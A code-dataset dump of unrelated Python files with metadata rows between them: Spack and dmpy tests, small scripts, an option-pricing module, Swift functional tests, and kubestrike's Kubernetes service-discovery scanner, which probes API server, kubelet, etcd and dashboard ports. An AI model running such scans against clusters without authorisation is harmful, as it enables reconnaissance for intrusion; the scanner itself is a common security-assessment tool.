[s.name for s in spec['d'].traverse(direction='parents')])
def test_copy_dependencies(self):
s1 = Spec('mpileaks ^mpich2@1.1')
s2 = s1.copy()
assert '^mpich2@1.1' in s2
assert '^mpich2' in s2
def test_construct_spec_with_deptypes(self):
"""Ensure that it is possible to construct a spec with explicit
dependency types."""
s = Spec.from_literal({
'a': {
'b': {'c:build': None},
'd': {
'e:build,link': {'f:run': None}
}
}
})
assert s['b']._dependencies['c'].deptypes == ('build',)
assert s['d']._dependencies['e'].deptypes == ('build', 'link')
assert s['e']._dependencies['f'].deptypes == ('run',)
assert s['b']._dependencies['c'].deptypes == ('build',)
assert s['d']._dependencies['e'].deptypes == ('build', 'link')
assert s['e']._dependencies['f'].deptypes == ('run',)
assert s['c']._dependents['b'].deptypes == ('build',)
assert s['e']._dependents['d'].deptypes == ('build', 'link')
assert s['f']._dependents['e'].deptypes == ('run',)
assert s['c']._dependents['b'].deptypes == ('build',)
assert s['e']._dependents['d'].deptypes == ('build', 'link')
assert s['f']._dependents['e'].deptypes == ('run',)
def check_diamond_deptypes(self, spec):
"""Validate deptypes in dt-diamond spec.
This ensures that concretization works properly when two packages
depend on the same dependency in different ways.
"""
assert spec['dt-diamond']._dependencies[
'dt-diamond-left'].deptypes == ('build', 'link')
assert spec['dt-diamond']._dependencies[
'dt-diamond-right'].deptypes == ('build', 'link')
assert spec['dt-diamond-left']._dependencies[
'dt-diamond-bottom'].deptypes == ('build',)
assert spec['dt-diamond-right'] ._dependencies[
'dt-diamond-bottom'].deptypes == ('build', 'link', 'run')
def check_diamond_normalized_dag(self, spec):
dag = Spec.from_literal({
'dt-diamond': {
'dt-diamond-left:build,link': {
'dt-diamond-bottom:build': None
},
'dt-diamond-right:build,link': {
'dt-diamond-bottom:build,link,run': None
},
}
})
assert spec.eq_dag(dag)
def test_normalize_diamond_deptypes(self):
"""Ensure that dependency types are preserved even if the same thing is
depended on in two different ways."""
s = Spec('dt-diamond')
s.normalize()
self.check_diamond_deptypes(s)
self.check_diamond_normalized_dag(s)
def test_concretize_deptypes(self):
"""Ensure that dependency types are preserved after concretization."""
s = Spec('dt-diamond')
s.concretize()
self.check_diamond_deptypes(s)
def test_copy_deptypes(self):
"""Ensure that dependency types are preserved by spec copy."""
s1 = Spec('dt-diamond')
s1.normalize()
self.check_diamond_deptypes(s1)
self.check_diamond_normalized_dag(s1)
s2 = s1.copy()
self.check_diamond_normalized_dag(s2)
self.check_diamond_deptypes(s2)
s3 = Spec('dt-diamond')
s3.concretize()
self.check_diamond_deptypes(s3)
s4 = s3.copy()
self.check_diamond_deptypes(s4)
def test_getitem_query(self):
s = Spec('mpileaks')
s.concretize()
# Check a query to a non-virtual package
a = s['callpath']
query = a.last_query
assert query.name == 'callpath'
assert len(query.extra_parameters) == 0
assert not query.isvirtual
# Check a query to a virtual package
a = s['mpi']
query = a.last_query
assert query.name == 'mpi'
assert len(query.extra_parameters) == 0
assert query.isvirtual
# Check a query to a virtual package with
# extra parameters after query
a = s['mpi:cxx,fortran']
query = a.last_query
assert query.name == 'mpi'
assert len(query.extra_parameters) == 2
assert 'cxx' in query.extra_parameters
assert 'fortran' in query.extra_parameters
assert query.isvirtual
def test_getitem_exceptional_paths(self):
s = Spec('mpileaks')
s.concretize()
# Needed to get a proxy object
q = s['mpileaks']
# Test that the attribute is read-only
with pytest.raises(AttributeError):
q.libs = 'foo'
with pytest.raises(AttributeError):
q.libs
def test_canonical_deptype(self):
# special values
assert canonical_deptype(all) == all_deptypes
assert canonical_deptype('all') == all_deptypes
with pytest.raises(ValueError):
canonical_deptype(None)
with pytest.raises(ValueError):
canonical_deptype([None])
# everything in all_deptypes is canonical
for v in all_deptypes:
assert canonical_deptype(v) == (v,)
# tuples
assert canonical_deptype(('build',)) == ('build',)
assert canonical_deptype(
('build', 'link', 'run')) == ('build', 'link', 'run')
assert canonical_deptype(
('build', 'link')) == ('build', 'link')
assert canonical_deptype(
('build', 'run')) == ('build', 'run')
# lists
assert canonical_deptype(
['build', 'link', 'run']) == ('build', 'link', 'run')
assert canonical_deptype(
['build', 'link']) == ('build', 'link')
assert canonical_deptype(
['build', 'run']) == ('build', 'run')
# sorting
assert canonical_deptype(
('run', 'build', 'link')) == ('build', 'link', 'run')
assert canonical_deptype(
('run', 'link', 'build')) == ('build', 'link', 'run')
assert canonical_deptype(
('run', 'link')) == ('link', 'run')
assert canonical_deptype(
('link', 'build')) == ('build', 'link')
# can't put 'all' in tuple or list
with pytest.raises(ValueError):
canonical_deptype(['all'])
with pytest.raises(ValueError):
canonical_deptype(('all',))
# invalid values
with pytest.raises(ValueError):
canonical_deptype('foo')
with pytest.raises(ValueError):
canonical_deptype(('foo', 'bar'))
with pytest.raises(ValueError):
canonical_deptype(('foo',))
def test_invalid_literal_spec(self):
# Can't give type 'build' to a top-level spec
with pytest.raises(spack.spec.SpecParseError):
Spec.from_literal({'foo:build': None})
# Can't use more than one ':' separator
with pytest.raises(KeyError):
Spec.from_literal({'foo': {'bar:build:link': None}})
| 33.218053
| 79
| 0.560285
|
66beedf769e23a8e57a034298ae78269da972e67
| 988
|
py
|
Python
|
tests/test_unit/test_add.py
|
kvg/pydm
|
6e2994e169db63d69b61686301b6fcd8f04f4010
|
[
"MIT"
] | null | null | null |
tests/test_unit/test_add.py
|
kvg/pydm
|
6e2994e169db63d69b61686301b6fcd8f04f4010
|
[
"MIT"
] | 5
|
2017-06-29T11:38:17.000Z
|
2020-03-31T00:29:49.000Z
|
tests/test_unit/test_add.py
|
kvg/pydm
|
6e2994e169db63d69b61686301b6fcd8f04f4010
|
[
"MIT"
] | 1
|
2017-06-14T15:39:07.000Z
|
2017-06-14T15:39:07.000Z
|
import io
import pytest
from dmpy import DistributedMake
class TestDmpyAdd(object):
def test_raises_on_adding_same_target_twice(self):
# given
dm = DistributedMake()
dm.add('hi', 'world', 'echo')
# when
with pytest.raises(Exception) as excinfo:
dm.add('hi', 'world', 'echo')
assert 'Tried to add target twice' in str(excinfo.value)
def test_raises_on_adding_none_target(self):
# given
dm = DistributedMake()
# when
with pytest.raises(ValueError) as excinfo:
dm.add(None, 'world', 'echo')
# then
assert 'target may not be None type' in str(excinfo.value)
def test_raises_on_adding_none_deps(self):
# given
dm = DistributedMake()
# when
with pytest.raises(ValueError) as excinfo:
dm.add('hi', ['world', None], 'echo')
# then
assert 'deps may not include None type' in str(excinfo.value)
| 24.7
| 69
| 0.59919
|
a26652b904fa5c4560333d60b91c7846479825fc
| 341
|
py
|
Python
|
migrations/versions/90a9015b6406_new.py
|
syth0le/async_cookeat
|
0cecdd44c064be6fe19c0d0ae8342d7baf5a9bb8
|
[
"CC0-1.0"
] | null | null | null |
migrations/versions/90a9015b6406_new.py
|
syth0le/async_cookeat
|
0cecdd44c064be6fe19c0d0ae8342d7baf5a9bb8
|
[
"CC0-1.0"
] | null | null | null |
migrations/versions/90a9015b6406_new.py
|
syth0le/async_cookeat
|
0cecdd44c064be6fe19c0d0ae8342d7baf5a9bb8
|
[
"CC0-1.0"
] | null | null | null |
"""new
Revision ID: 90a9015b6406
Revises: 494340202f18
Create Date: 2021-08-23 15:09:14.459946
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '90a9015b6406'
down_revision = '494340202f18'
branch_labels = None
depends_on = None
def upgrade():
pass
def downgrade():
pass
| 13.64
| 40
| 0.73607
|
1eecadc662169e9ca11c8d3ae2b0aa084a2f2c23
| 679
|
py
|
Python
|
test.py
|
avrogachev/vk_quest_bot
|
9728d600302db514f1c71784b3b67804994cc46a
|
[
"MIT"
] | 3
|
2019-10-01T13:52:07.000Z
|
2020-09-07T17:39:02.000Z
|
test.py
|
avrogachev/vk_quest_bot
|
9728d600302db514f1c71784b3b67804994cc46a
|
[
"MIT"
] | 1
|
2019-10-01T13:55:53.000Z
|
2019-10-01T14:19:50.000Z
|
test.py
|
avrogachev/vk_quest_bot
|
9728d600302db514f1c71784b3b67804994cc46a
|
[
"MIT"
] | null | null | null |
from vk import VK
from vk.utils import TaskManager
from vk.bot_framework import Dispatcher, rules
from vk.bot_framework import BaseRule, BaseMiddleware
from vk import types
import logging
from config import TOKEN, GROUP_ID # PLUGINS_PATH #, loop
from keyboards import *
logging.basicConfig(level="DEBUG")
vk = VK(TOKEN)
gid = GROUP_ID
task_manager = TaskManager(vk.loop)
api = vk.get_api()
dp = Dispatcher(vk, gid)
@dp.message_handler(rules.Command("start"))
async def handle(message: types.Message, data: dict):
await message.reply("Hello!")
async def run():
dp.run_polling()
if __name__ == "__main__":
task_manager.add_task(run)
task_manager.run()
| 19.4
| 58
| 0.745214
|
ac5ca927faeafec46fcd049695ea34fd4119c30a
| 3,516
|
py
|
Python
|
esovalue/trinomial_tree.py
|
snthibaud/esovalue
|
9d0ed07a85e58637c17fd595c63ebf4fb0d4ac22
|
[
"MIT"
] | 2
|
2022-01-26T19:56:30.000Z
|
2022-02-09T01:20:22.000Z
|
esovalue/trinomial_tree.py
|
snthibaud/esovalue
|
9d0ed07a85e58637c17fd595c63ebf4fb0d4ac22
|
[
"MIT"
] | null | null | null |
esovalue/trinomial_tree.py
|
snthibaud/esovalue
|
9d0ed07a85e58637c17fd595c63ebf4fb0d4ac22
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from typing import Optional
from mpmath import mpf, ln, mp
ONE = mpf("1")
ZERO = mpf("0")
@dataclass
class TrinomialNode:
stock_value: Optional[mpf] = None
option_value: Optional[mpf] = None
up: Optional['TrinomialNode'] = None
middle: Optional['TrinomialNode'] = None
down: Optional['TrinomialNode'] = None
def get_trinomial_tree(depth: int) -> TrinomialNode:
assert depth > 0
lattice = [[TrinomialNode()]]
for level in range(1, depth):
lattice.append([TrinomialNode() for _ in range(-level, level+1)])
for i in range(0, len(lattice)-1):
width = len(lattice[i])
for j in range(0, width):
lattice[i][j].down = lattice[i+1][j]
lattice[i][j].middle = lattice[i+1][j+1]
lattice[i][j].up = lattice[i+1][j+2]
return lattice[0][0]
def set_stock_prices(s0: mpf, u: mpf, root: TrinomialNode):
q = [(s0, root, True, True)]
while q:
s, n, h, l = q.pop()
if n is not None:
n.stock_value = s
if h:
q.append((s*u, n.up, True, False))
if l:
q.append((s/u, n.down, False, True))
q.append((s, n.middle, False, False))
def present_value(fv: mpf, dt: mpf, r: mpf):
"""
Calculate present value
:param fv: Future value
:param dt: Time difference (in years)
:param r: Risk-free interest rate
:return: Present value
"""
return mp.e**(-r*dt)*fv
def calculate_eso_prices(root: TrinomialNode, k: mpf, dt: mpf, s: mpf, r: mpf, q: mpf, er: mpf, v: mpf,
m: Optional[mpf]):
"""
Calculate the price of an employee stock option over time
:param root: Root node
:param k: Strike price
:param dt: Length of one time step (in years)
:param s: Volatility (standard deviation)
:param r: Risk-free interest rate
:param q: Dividend rate
:param er: Employee exit rate (over a year)
:param v: Vesting period (in years)
:param m: Multiplier for early exercise
"""
level = [root]
levels = [level]
while level:
children = []
for i, n in enumerate(level):
middle_child = n.middle
if middle_child:
if i == 0:
children.append(n.down)
children.append(middle_child)
if i + 1 == len(level):
children.append(n.up)
else:
break
level = children
if level:
levels.append(level)
leaves = levels[-1]
total_steps = len(levels)
for n in leaves:
n.option_value = max(ZERO, n.stock_value - k) if (total_steps-1)*dt >= v else ZERO
for i in range(len(levels)-2, -1, -1):
for node in levels[i]:
vested = i * dt >= v
if vested and m and node.stock_value >= k*m:
node.option_value = node.stock_value - k
else:
a = mp.sqrt(dt/(12*s**2))*(r-q-s**2/2) if s > ZERO else ZERO
b = ONE/6
pd = -a + b
pm = 4*b
pu = a + b
er_dt = ln(ONE+er)*dt
option_value = (ONE-er_dt)*present_value(
pd*node.down.option_value + pm*node.middle.option_value + pu*node.up.option_value, dt, r)
if vested:
option_value += er_dt*max(node.stock_value-k, ZERO)
node.option_value = option_value
| 32.555556
| 109
| 0.544653
|
b474eb138f09a6b6fea0f45964a8f8a77732ea10
| 449
|
py
|
Python
|
gunicorn.conf.py
|
richardzilincikPantheon/bottle-yang-extractor-validator
|
12cb99bf8b0bde2d14c351695c4ad4b1a0665dd8
|
[
"BSD-2-Clause"
] | 4
|
2019-06-15T03:11:41.000Z
|
2021-06-29T05:34:59.000Z
|
gunicorn.conf.py
|
richardzilincikPantheon/bottle-yang-extractor-validator
|
12cb99bf8b0bde2d14c351695c4ad4b1a0665dd8
|
[
"BSD-2-Clause"
] | 39
|
2019-07-08T06:58:26.000Z
|
2021-10-06T11:39:25.000Z
|
gunicorn.conf.py
|
richardzilincikPantheon/bottle-yang-extractor-validator
|
12cb99bf8b0bde2d14c351695c4ad4b1a0665dd8
|
[
"BSD-2-Clause"
] | 7
|
2019-09-18T15:08:26.000Z
|
2021-12-12T13:56:05.000Z
|
bind = "unix:/var/run/yang/yangvalidator.sock"
#umask = os.umask('007')
workers = 2
max_requests = 1000
timeout = 300
keep_alive = 2
#user = 'yang'
#group = 'yang'
preload = True
accesslog = '/var/yang/logs/uwsgi/yang-validator-access.log'
errorlog = '/var/yang/logs/uwsgi/yang-validator-error.log'
loglevel = 'debug'
#change log format
access_log_format = '%(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"'
worker_class = 'gevent'
| 20.409091
| 81
| 0.659243
|
85ee568b42aee238842cd9390f9b1e00e31982db
| 284
|
py
|
Python
|
ExampleSlice/learnSlice.py
|
subash-kc/2022-01-04-Python
|
5ce51e4265bcd860a4e62423edef6ec9cd1437b4
|
[
"MIT"
] | 1
|
2022-01-14T18:03:42.000Z
|
2022-01-14T18:03:42.000Z
|
ExampleSlice/learnSlice.py
|
subash-kc/2022-01-04-Python
|
5ce51e4265bcd860a4e62423edef6ec9cd1437b4
|
[
"MIT"
] | null | null | null |
ExampleSlice/learnSlice.py
|
subash-kc/2022-01-04-Python
|
5ce51e4265bcd860a4e62423edef6ec9cd1437b4
|
[
"MIT"
] | null | null | null |
website1 = "http://localhost:3000"
slice_local = slice(7, -5)
print(website1[slice_local])
website2 = "http://google.com"
slice_google = slice(7, -4)
print(website2[slice_google])
website3 = "http://wikipedia.com"
slice_wikipedia = slice(7, -4)
print(website3[slice_wikipedia])
| 17.75
| 34
| 0.725352
|
1fce3e6dc5debe0080aaa3f193f2a363f6d04946
| 126
|
py
|
Python
|
ktrain/__init__.py
|
sathishksankarpandi/ktrain
|
bc9169661592ee14b95d9e56622dbb20e66b3568
|
[
"MIT"
] | null | null | null |
ktrain/__init__.py
|
sathishksankarpandi/ktrain
|
bc9169661592ee14b95d9e56622dbb20e66b3568
|
[
"MIT"
] | null | null | null |
ktrain/__init__.py
|
sathishksankarpandi/ktrain
|
bc9169661592ee14b95d9e56622dbb20e66b3568
|
[
"MIT"
] | null | null | null |
from .version import __version__
from .core import *
__all__ = ['get_learner', 'ArrayTrainer', 'GenTrainer', 'get_predictor']
| 31.5
| 72
| 0.753968
|
ad8be1c431eeb77cea57975f7f209ce38fa477f6
| 635
|
py
|
Python
|
client/data/electricity_master_lookup_to_json.py
|
yangsiyu007/event-footprint
|
5e629ae69822c666f70edeb71de2d3dea3eda4ba
|
[
"MIT"
] | null | null | null |
client/data/electricity_master_lookup_to_json.py
|
yangsiyu007/event-footprint
|
5e629ae69822c666f70edeb71de2d3dea3eda4ba
|
[
"MIT"
] | 2
|
2021-05-11T08:34:11.000Z
|
2022-02-18T23:50:43.000Z
|
client/data/electricity_master_lookup_to_json.py
|
yangsiyu007/event-footprint
|
5e629ae69822c666f70edeb71de2d3dea3eda4ba
|
[
"MIT"
] | null | null | null |
"""
Convert a CSV version of the Electricity Master Lookup table to a JSON
"""
import json
import pandas as pd
with open('electricity_master_lookup.csv') as f:
csv_table = pd.read_csv(f, header=0)
print(csv_table.head(5))
json_table = {} # "Electric Subregion" to "t CO2e / kWh"
for i, row in csv_table.iterrows():
json_table[row['Electric Subregion']] = row['t CO2e / kWh']
assert json_table['United States - NWPP'] == 0.0002972
print(f'In JSON table, United States - NWPP is {json_table["United States - NWPP"]}')
with open('../src/electricity_master_lookup.json', 'w') as f:
json.dump(json_table, f, indent=2)
| 25.4
| 85
| 0.699213
|
f198f6397c37e45f536281c27bdd9f5a88f06e94
| 10,263
|
py
|
Python
|
kubestrike/service_discovery.py
|
tpoindessous/kubestrike
|
7fb3a80d1f961b974e0f9360399185ab7b7f1fcf
|
[
"MIT"
] | 1
|
2021-08-03T10:12:13.000Z
|
2021-08-03T10:12:13.000Z
|
kubestrike/service_discovery.py
|
tpoindessous/kubestrike
|
7fb3a80d1f961b974e0f9360399185ab7b7f1fcf
|
[
"MIT"
] | 3
|
2021-11-14T14:41:24.000Z
|
2021-11-14T16:03:54.000Z
|
kubestrike/service_discovery.py
|
tpoindessous/kubestrike
|
7fb3a80d1f961b974e0f9360399185ab7b7f1fcf
|
[
"MIT"
] | null | null | null |
import socket
import warnings
from kubestrike.bars import prefix, sub_prefix, service_open, print_msg_box
warnings.filterwarnings("ignore")
class ServiceDiscovery(object):
def __init__(self,file_object):
self.result = {}
self.service_discovery_status = []
self.file_obj = file_object
def port_scan(self, host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((host, port))
if result == 0:
return True
else:
return False
@prefix('[+] Performing Service Discovery.................................................')
def service_result(self, ip, port=None):
print("Performing Service Discovery on host {host}..........".format(host=str(ip)),file=self.file_obj)
self.apiserver_secure(ip, port)
self.apiserver_insecure(ip)
self.kubelet_rw(ip)
self.kubelet_ro(ip)
self.kubecontroller(ip)
self.etcd_client(ip)
self.etcd_server(ip)
self.kubeproxy_healthcheck(ip)
self.scheduler(ip)
self.kubeproxy(ip)
self.important_ports(ip)
self.dashboard(ip)
self.service_discovery_results_status()
@prefix('[+] KubeServer Secure Identified Services ........................................')
def service_discovery_results_status(self):
print('\n', file=self.file_obj)
print("KubeServer Secure Identified Services ........................................",file=self.file_obj)
service_discovery_status = self.service_discovery_status
for status in service_discovery_status:
service_open(status,self.file_obj)
print('\n',file=self.file_obj)
print_msg_box('######## Below mentioned are the valid urls of the identified Endpoints ########', file_obj=self.file_obj)
for service, status in self.result.items():
if status.get('active') == True:
end_point = status.get('end_point')
print(" --> {service} identified {end_point}".format(service=service,end_point=end_point),file=self.file_obj)
@sub_prefix(' [+] Scanning for KubeServer Secure Service................................')
def apiserver_secure(self, host, port=None):
print(" [+] Scanning for KubeServer Secure Service................................",file=self.file_obj)
ports = [443, 6443, 8443]
apiserver_secure = False
end_point = None
if port:
ports.append(int(port))
for port in ports:
p_res = self.port_scan(host, port)
if p_res:
apiserver_secure = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('KubeServer Secure')
break
self.result.update({'apiserver_secure': {'active': apiserver_secure, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for KubeServer Insecure Service..............................')
def apiserver_insecure(self, host):
print(" [+] Scanning for KubeServer Insecure Service..............................", file=self.file_obj)
apiserver_insecure = False
end_point = None
port = 8080
p_res = self.port_scan(host, port)
if p_res:
apiserver_insecure = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('KubeServer Insecure Service')
self.result.update({'apiserver_insecure': {'active': apiserver_insecure, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kubelet ReadWrite Service................................')
def kubelet_rw(self, host):
print(" [+] Scanning for Kubelet ReadWrite Service................................", file=self.file_obj)
kubelet_rw = False
end_point = None
port = 10250
p_res = self.port_scan(host, port)
if p_res:
kubelet_rw = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubelet ReadWrite Service')
self.result.update({'kubelet_rw': {'active': kubelet_rw, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for kubecontroller Service...................................')
def kubecontroller(self, host):
print(" [+] Scanning for kubecontroller Service................................", file=self.file_obj)
kubecontroller = False
end_point = None
port = 10257
p_res = self.port_scan(host, port)
if p_res:
kubecontroller = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubecontroller Service')
self.result.update({'kubecontroller': {'active': kubecontroller, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kubelet Readonly Service.................................')
def kubelet_ro(self, host):
print(" [+] Scanning for Kubelet Readonly Service.................................", file=self.file_obj)
kubelet_ro = False
end_point = None
port = 10255
p_res = self.port_scan(host, port)
if p_res:
kubelet_ro = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubelet Readonly Service')
self.result.update({'kubelet_ro': {'active': kubelet_ro, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for ETCD Client..............................................')
def etcd_client(self, host):
print(" [+] Scanning for ETCD Client..............................................", file=self.file_obj)
etcd_client = False
end_point = None
port = 2379
p_res = self.port_scan(host, port)
if p_res:
etcd_client = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('ETCD Client')
self.result.update({'etcd_client': {'active': etcd_client, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for ETCD Server..............................................')
def etcd_server(self, host):
print(" [+] Scanning for ETCD Server..............................................", file=self.file_obj)
etcd_server = False
end_point = None
port = 2380
p_res = self.port_scan(host, port)
if p_res:
etcd_server = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('ETCD Server')
self.result.update({'etcd_server': {'active': etcd_server, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kube proxy Healthcheck...................................')
def kubeproxy_healthcheck(self, host):
print(" [+] Scanning for Kube proxy Healthcheck...................................", file=self.file_obj)
kubeproxy_healthcheck = False
end_point = None
ports = [10256, 10257, 10249]
for port in ports:
p_res = self.port_scan(host, port)
if p_res:
kubeproxy_healthcheck = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kube proxy Healthcheck')
break
self.result.update({'kubeproxy_healthcheck': {'active': kubeproxy_healthcheck, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kube Scheduler Service...................................')
def scheduler(self, host):
print(" [+] Scanning for Kube Scheduler Service...................................", file=self.file_obj)
scheduler = False
end_point = None
ports = [10251, 10259]
for port in ports:
p_res = self.port_scan(host, port)
if p_res:
scheduler = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kube Scheduler Service')
break
self.result.update({'scheduler': {'active': scheduler, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kube proxy ..............................................')
def kubeproxy(self, host):
print(" [+] Scanning for Kube proxy ..............................................", file=self.file_obj)
kubeproxy = False
end_point = None
port = 8001
p_res = self.port_scan(host, port)
if p_res:
kubeproxy = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kube proxy')
self.result.update({'kubeproxy': {'active': kubeproxy, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for known Open Ports.........................................')
def important_ports(self, host):
print(" [+] Scanning for known Open Ports.........................................", file=self.file_obj)
important_ports = False
end_point = None
port = 22
p_res = self.port_scan(host, port)
if p_res:
important_ports = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Open Port 22')
self.result.update({'important_ports': {'active': important_ports, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kubernetes Dashboard.....................................')
def dashboard(self, host):
print(" [+] Scanning for Kubernetes Dashboard.....................................", file=self.file_obj)
dashboard = False
end_point = None
port = 3000
p_res = self.port_scan(host, port)
if p_res:
dashboard = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubernetes Dashboard')
self.result.update({'dashboard': {'active': dashboard, 'end_point': end_point}})
| 47.513889
| 129
| 0.535711
|
d3b415c8dba1649d5f6a2b1ac86ee84ad9b47c3c
| 930
|
py
|
Python
|
isi_sdk_8_0_1/test/test_smb_log_level_filters.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_0_1/test/test_smb_log_level_filters.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_0_1/test/test_smb_log_level_filters.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.smb_log_level_filters import SmbLogLevelFilters # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestSmbLogLevelFilters(unittest.TestCase):
"""SmbLogLevelFilters unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSmbLogLevelFilters(self):
"""Test SmbLogLevelFilters"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.smb_log_level_filters.SmbLogLevelFilters() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22.682927
| 95
| 0.713978
|
796846d565a0f7c7da3a08ddc8c88b9ba2522c75
| 62,147
|
py
|
Python
|
test/functional/test_object.py
|
smerritt/swift
|
c4751d0d551ad193a205c71821f6770a31146421
|
[
"Apache-2.0"
] | null | null | null |
test/functional/test_object.py
|
smerritt/swift
|
c4751d0d551ad193a205c71821f6770a31146421
|
[
"Apache-2.0"
] | 12
|
2015-06-23T23:20:17.000Z
|
2016-01-27T00:37:12.000Z
|
test/functional/test_object.py
|
smerritt/swift
|
c4751d0d551ad193a205c71821f6770a31146421
|
[
"Apache-2.0"
] | 5
|
2015-06-04T19:00:11.000Z
|
2015-12-16T21:04:33.000Z
|
#!/usr/bin/python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import json
import unittest2
from uuid import uuid4
import time
from six.moves import range
from test.functional import check_response, retry, requires_acls, \
requires_policies, SkipTest
import test.functional as tf
def setUpModule():
tf.setup_package()
def tearDownModule():
tf.teardown_package()
class TestObject(unittest2.TestCase):
def setUp(self):
if tf.skip or tf.skip2:
raise SkipTest
if tf.in_process:
tf.skip_if_no_xattrs()
self.container = uuid4().hex
self.containers = []
self._create_container(self.container)
self._create_container(self.container, use_account=2)
self.obj = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, self.obj), 'test',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
def _create_container(self, name=None, headers=None, use_account=1):
if not name:
name = uuid4().hex
self.containers.append(name)
headers = headers or {}
def put(url, token, parsed, conn, name):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + name, '',
new_headers)
return check_response(conn)
resp = retry(put, name, use_account=use_account)
resp.read()
self.assertEqual(resp.status, 201)
# With keystoneauth we need the accounts to have had the project
# domain id persisted as sysmeta prior to testing ACLs. This may
# not be the case if, for example, the account was created using
# a request with reseller_admin role, when project domain id may
# not have been known. So we ensure that the project domain id is
# in sysmeta by making a POST to the accounts using an admin role.
def post(url, token, parsed, conn):
conn.request('POST', parsed.path, '', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(post, use_account=use_account)
resp.read()
self.assertEqual(resp.status, 204)
return name
def tearDown(self):
if tf.skip:
raise SkipTest
# get list of objects in container
def get(url, token, parsed, conn, container):
conn.request(
'GET', parsed.path + '/' + container + '?format=json', '',
{'X-Auth-Token': token})
return check_response(conn)
# delete an object
def delete(url, token, parsed, conn, container, obj):
conn.request(
'DELETE', '/'.join([parsed.path, container, obj['name']]), '',
{'X-Auth-Token': token})
return check_response(conn)
for container in self.containers:
while True:
resp = retry(get, container)
body = resp.read()
if resp.status == 404:
break
self.assertEqual(resp.status // 100, 2, resp.status)
objs = json.loads(body)
if not objs:
break
for obj in objs:
resp = retry(delete, container, obj)
resp.read()
self.assertIn(resp.status, (204, 404))
# delete the container
def delete(url, token, parsed, conn, name):
conn.request('DELETE', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
for container in self.containers:
resp = retry(delete, container)
resp.read()
self.assertIn(resp.status, (204, 404))
def test_metadata(self):
obj = 'test_metadata'
req_metadata = {}
def put(url, token, parsed, conn):
headers = {'X-Auth-Token': token}
headers.update(req_metadata)
conn.request('PUT', '%s/%s/%s' % (
parsed.path, self.container, obj
), '', headers)
return check_response(conn)
def get(url, token, parsed, conn):
conn.request(
'GET',
'%s/%s/%s' % (parsed.path, self.container, obj),
'',
{'X-Auth-Token': token})
return check_response(conn)
def post(url, token, parsed, conn):
headers = {'X-Auth-Token': token}
headers.update(req_metadata)
conn.request('POST', '%s/%s/%s' % (
parsed.path, self.container, obj
), '', headers)
return check_response(conn)
def metadata(resp):
metadata = {}
for k, v in resp.headers.items():
if 'meta' in k.lower():
metadata[k] = v
return metadata
# empty put
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {})
# empty post
resp = retry(post)
resp.read()
self.assertEqual(resp.status, 202)
resp = retry(get)
self.assertEqual('', resp.read())
self.assertEqual(resp.status, 200)
self.assertEqual(metadata(resp), {})
# metadata put
req_metadata = {
'x-object-meta-Color': 'blUe',
